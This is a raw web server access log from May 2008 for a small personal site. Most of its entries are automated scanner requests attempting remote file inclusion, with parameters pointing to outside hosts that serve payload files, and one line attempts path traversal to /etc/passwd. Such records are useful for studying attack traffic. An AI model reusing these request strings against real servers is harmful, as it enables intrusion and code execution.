213.92.118.223 - - [10/May/2008:06:32:57 -0500] "GET /logs/access_log.1204761600//appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
213.92.118.223 - - [10/May/2008:06:32:58 -0500] "GET //appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
213.92.118.223 - - [10/May/2008:06:32:59 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
213.92.118.223 - - [10/May/2008:06:33:03 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
213.92.118.223 - - [10/May/2008:06:33:06 -0500] "GET /logs/access_log.1204761600//appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
213.92.118.223 - - [10/May/2008:06:33:07 -0500] "GET //appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
213.92.118.223 - - [10/May/2008:06:33:11 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
213.92.118.223 - - [10/May/2008:06:33:21 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
72.29.70.163 - - [10/May/2008:06:35:15 -0500] "GET /logs//modules/my_egallery/index.php?do=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.810"
72.29.70.163 - - [10/May/2008:06:35:15 -0500] "GET //modules/my_egallery/index.php?do=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
65.55.208.123 - - [10/May/2008:06:38:05 -0500] "GET /logs/access_log.1179014400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
87.106.16.18 - - [10/May/2008:06:38:45 -0500] "GET /logs/access_log.1207785600/index.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
87.106.16.18 - - [10/May/2008:06:38:45 -0500] "GET /logs/index.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
87.106.16.18 - - [10/May/2008:06:39:39 -0500] "GET /logs/access_log.1204761600/index.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
72.29.70.163 - - [10/May/2008:06:45:40 -0500] "GET /logs//modules/my_egallery/index.php?do=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.810"
72.29.70.163 - - [10/May/2008:06:45:40 -0500] "GET //modules/my_egallery/index.php?do=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
203.146.251.123 - - [10/May/2008:06:49:24 -0500] "GET /logs/access_log.1207785600/index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
203.146.251.123 - - [10/May/2008:06:50:29 -0500] "GET /logs/access_log.1204761600/index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
74.6.29.41 - - [10/May/2008:06:50:37 -0500] "GET /logs/access_log.1181606400 HTTP/1.0" 200 156333 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.128.51 - - [10/May/2008:07:05:12 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
209.59.128.51 - - [10/May/2008:07:05:13 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
189.25.246.196 - - [10/May/2008:07:06:32 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
72.29.70.163 - - [10/May/2008:07:08:11 -0500] "GET /logs/errors.php?error=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.29.70.163 - - [10/May/2008:07:08:11 -0500] "GET /errors.php?error=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
189.25.246.196 - - [10/May/2008:07:09:03 -0500] "GET /logs/access_log.1204761600//appserv/main.php?appserv_root=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
74.6.7.151 - - [10/May/2008:07:09:15 -0500] "GET /logs/access_log.1155340800 HTTP/1.0" 200 195711 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
213.246.51.45 - - [10/May/2008:07:12:28 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.246.51.45 - - [10/May/2008:07:12:29 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
213.246.51.45 - - [10/May/2008:07:18:57 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.246.51.45 - - [10/May/2008:07:18:57 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.59.128.51 - - [10/May/2008:07:25:10 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
209.59.128.51 - - [10/May/2008:07:25:10 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.29.70.163 - - [10/May/2008:07:30:39 -0500] "GET /logs/errors.php?error=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.29.70.163 - - [10/May/2008:07:30:39 -0500] "GET /errors.php?error=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.30.179.237 - - [10/May/2008:07:43:48 -0500] "GET /logs/access_log.1208217600 HTTP/1.0" 200 156516 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.52.130.240 - - [10/May/2008:07:45:00 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.52.130.240 - - [10/May/2008:07:45:01 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
213.246.51.45 - - [10/May/2008:07:45:47 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.246.51.45 - - [10/May/2008:07:45:48 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
200.37.173.162 - - [10/May/2008:07:48:41 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
200.37.173.162 - - [10/May/2008:07:48:41 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.805"
64.42.243.129 - - [10/May/2008:07:48:47 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.halo2ninja.com/downloads/.../id2.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
64.42.243.129 - - [10/May/2008:07:48:47 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.halo2ninja.com/downloads/.../id2.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
203.130.242.48 - - [10/May/2008:07:49:50 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cntb-rzd.ru//modules/4nAlbum/public/r.txt???? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
203.130.242.48 - - [10/May/2008:07:49:50 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cntb-rzd.ru//modules/4nAlbum/public/r.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
209.59.128.51 - - [10/May/2008:07:50:56 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
209.59.128.51 - - [10/May/2008:07:50:56 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
74.50.11.20 - - [10/May/2008:07:51:56 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.808"
74.50.11.20 - - [10/May/2008:07:51:56 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.808"
74.50.11.20 - - [10/May/2008:07:51:56 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.808"
64.42.243.129 - - [10/May/2008:07:53:14 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.aikido-steyr.at/aikinews/parse/smilies/id.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
64.42.243.129 - - [10/May/2008:07:53:14 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.aikido-steyr.at/aikinews/parse/smilies/id.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
209.59.128.51 - - [10/May/2008:07:54:37 -0500] "GET /logs/access_log.1207785600//faqsupport/samplefaqsupport.php?path[docroot]=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
209.59.128.51 - - [10/May/2008:07:54:38 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 316 "-""libwww-perl/5.810"
209.59.128.51 - - [10/May/2008:07:54:38 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
209.59.128.51 - - [10/May/2008:07:54:40 -0500] "GET /logs/access_log.1207180800//faqsupport/samplefaqsupport.php?path[docroot]=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
213.246.51.45 - - [10/May/2008:07:55:14 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
213.246.51.45 - - [10/May/2008:07:55:15 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
64.42.243.129 - - [10/May/2008:07:55:32 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.halo2ninja.com/downloads/.../id2.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
64.42.243.129 - - [10/May/2008:07:55:32 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.halo2ninja.com/downloads/.../id2.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
64.22.89.194 - - [10/May/2008:07:56:50 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
64.22.89.194 - - [10/May/2008:07:56:50 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
72.52.130.240 - - [10/May/2008:07:59:46 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
72.52.130.240 - - [10/May/2008:07:59:46 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
74.53.197.2 - - [10/May/2008:08:07:26 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
74.53.197.2 - - [10/May/2008:08:07:26 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
64.42.243.129 - - [10/May/2008:08:16:26 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.aikido-steyr.at/aikinews/parse/smilies/id.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
64.42.243.129 - - [10/May/2008:08:16:27 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.aikido-steyr.at/aikinews/parse/smilies/id.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
208.116.44.60 - - [10/May/2008:08:17:04 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://bgsro.go.ro/id5.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.811"
208.116.44.60 - - [10/May/2008:08:17:04 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://bgsro.go.ro/id5.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.811"
200.37.173.162 - - [10/May/2008:08:20:05 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
200.37.173.162 - - [10/May/2008:08:20:06 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
65.55.208.124 - - [10/May/2008:08:21:27 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.124 - - [10/May/2008:08:21:28 -0500] "GET /logs/access_log.1165708800 HTTP/1.1" 200 172282 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
213.218.137.36 - - [10/May/2008:08:25:26 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.810"
213.218.137.36 - - [10/May/2008:08:25:26 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.810"
74.6.20.45 - - [10/May/2008:08:26:43 -0500] "GET /?M=D HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
82.192.69.117 - - [10/May/2008:08:26:54 -0500] "GET /logs/index1.php?my=http://www.intjudo.tv/files/videos/thumbnails/test1.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
82.192.69.117 - - [10/May/2008:08:26:55 -0500] "GET /index1.php?my=http://www.intjudo.tv/files/videos/thumbnails/test1.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
82.192.69.117 - - [10/May/2008:08:28:10 -0500] "GET /logs/index1.php?my=http://www.intjudo.tv/files/temp_files/temp_photos/test1.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
82.192.69.117 - - [10/May/2008:08:28:10 -0500] "GET /index1.php?my=http://www.intjudo.tv/files/temp_files/temp_photos/test1.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
85.18.11.77 - - [10/May/2008:08:39:37 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://bgsro.go.ro/id5.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
85.18.11.77 - - [10/May/2008:08:39:38 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://bgsro.go.ro/id5.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
67.195.37.172 - - [10/May/2008:08:42:51 -0500] "GET /costume/costume2.htm HTTP/1.0" 200 1810 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.208.133 - - [10/May/2008:08:44:05 -0500] "GET /logs/access_log.1199404800 HTTP/1.1" 200 222118 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
85.18.11.77 - - [10/May/2008:08:44:34 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://bgsro.go.ro/id5.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
85.18.11.77 - - [10/May/2008:08:44:34 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://bgsro.go.ro/id5.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
85.18.11.77 - - [10/May/2008:08:44:59 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://bgsro.go.ro/id5.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
85.18.11.77 - - [10/May/2008:08:45:05 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://bgsro.go.ro/id5.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
85.18.11.77 - - [10/May/2008:08:46:42 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://bgsro.go.ro/id5.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
85.18.11.77 - - [10/May/2008:08:46:42 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://bgsro.go.ro/id5.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
72.55.137.199 - - [10/May/2008:08:48:49 -0500] "GET /logs/access_log.1207785600/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
72.55.137.199 - - [10/May/2008:08:48:49 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
72.55.137.199 - - [10/May/2008:08:48:49 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
74.6.27.108 - - [10/May/2008:08:54:33 -0500] "GET /logs/access_log.1193788800 HTTP/1.0" 200 236887 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.172 - - [10/May/2008:08:55:29 -0500] "GET /costume/thmb3.htm HTTP/1.0" 200 2922 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.228 - - [10/May/2008:08:57:40 -0500] "GET /logs/access_log.1168473600 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
203.72.181.15 - - [10/May/2008:08:58:15 -0500] "GET /logs/access_log.1207785600//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 372 "-""libwww-perl/5.65"
203.72.181.15 - - [10/May/2008:08:58:15 -0500] "GET /logs/access_log.1207785600//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 372 "-""libwww-perl/5.65"
203.72.181.15 - - [10/May/2008:08:58:15 -0500] "GET /logs/access_log.1207785600//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 372 "-""libwww-perl/5.65"
203.72.181.15 - - [10/May/2008:08:58:16 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.65"
203.72.181.15 - - [10/May/2008:08:58:16 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.65"
203.72.181.15 - - [10/May/2008:08:58:16 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.65"
203.72.181.15 - - [10/May/2008:08:58:16 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.65"
203.72.181.15 - - [10/May/2008:08:58:16 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.65"
203.72.181.15 - - [10/May/2008:08:58:16 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.65"
75.108.63.249 - - [10/May/2008:08:59:13 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?sourceid=navclient&aq=t&ie=UTF-8&rlz=1T4DMUS_enUS222US222&q=vintage+tattoo+flash""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
75.108.63.249 - - [10/May/2008:08:59:13 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
75.108.63.249 - - [10/May/2008:08:59:16 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
75.108.63.249 - - [10/May/2008:08:59:16 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
75.108.63.249 - - [10/May/2008:08:59:17 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (compatible; Google Desktop)"
74.6.20.54 - - [10/May/2008:09:01:50 -0500] "GET /logs/access_log.1156377600 HTTP/1.0" 200 132455 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.19.224 - - [10/May/2008:09:02:54 -0500] "GET /logs/access_log.1170028800 HTTP/1.0" 200 144070 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.172 - - [10/May/2008:09:07:05 -0500] "GET /?D=A HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
193.51.215.1 - - [10/May/2008:09:10:09 -0500] "GET /logs//?mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.0" 200 82840 "-""libwww-perl/5.803"
193.51.215.1 - - [10/May/2008:09:10:10 -0500] "GET //?mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.0" 200 1231 "-""libwww-perl/5.803"
82.104.53.93 - - [10/May/2008:09:16:08 -0500] "GET /logs//index.php?option=com_peoplebook&Itemid=&mosConfig_absolute_path=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
82.104.53.93 - - [10/May/2008:09:16:08 -0500] "GET //index.php?option=com_peoplebook&Itemid=&mosConfig_absolute_path=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
193.51.215.1 - - [10/May/2008:09:17:08 -0500] "GET /logs//?mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.0" 200 82840 "-""libwww-perl/5.803"
193.51.215.1 - - [10/May/2008:09:17:08 -0500] "GET //?mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.0" 200 1231 "-""libwww-perl/5.803"
207.44.147.74 - - [10/May/2008:09:20:42 -0500] "GET /logs/access_log.1207785600/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.arpel.org/ex/baram.txt?? HTTP/1.1" 404 371 "-""libwww-perl/5.811"
207.44.147.74 - - [10/May/2008:09:20:42 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.arpel.org/ex/baram.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.811"
207.44.147.74 - - [10/May/2008:09:20:42 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.arpel.org/ex/baram.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.811"
82.104.53.93 - - [10/May/2008:09:24:52 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_typedcontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
82.104.53.93 - - [10/May/2008:09:24:52 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_typedcontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
74.6.20.253 - - [10/May/2008:09:25:17 -0500] "GET /logs/access_log.1175126400 HTTP/1.0" 200 213157 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.208.123 - - [10/May/2008:09:27:54 -0500] "GET /logs/access_log.1208736000 HTTP/1.1" 200 277202 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
203.130.242.48 - - [10/May/2008:09:28:27 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
203.130.242.48 - - [10/May/2008:09:28:27 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
67.158.77.110 - - [10/May/2008:09:35:08 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_design""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
67.158.77.110 - - [10/May/2008:09:35:08 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
67.158.77.110 - - [10/May/2008:09:35:12 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
67.158.77.110 - - [10/May/2008:09:35:12 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
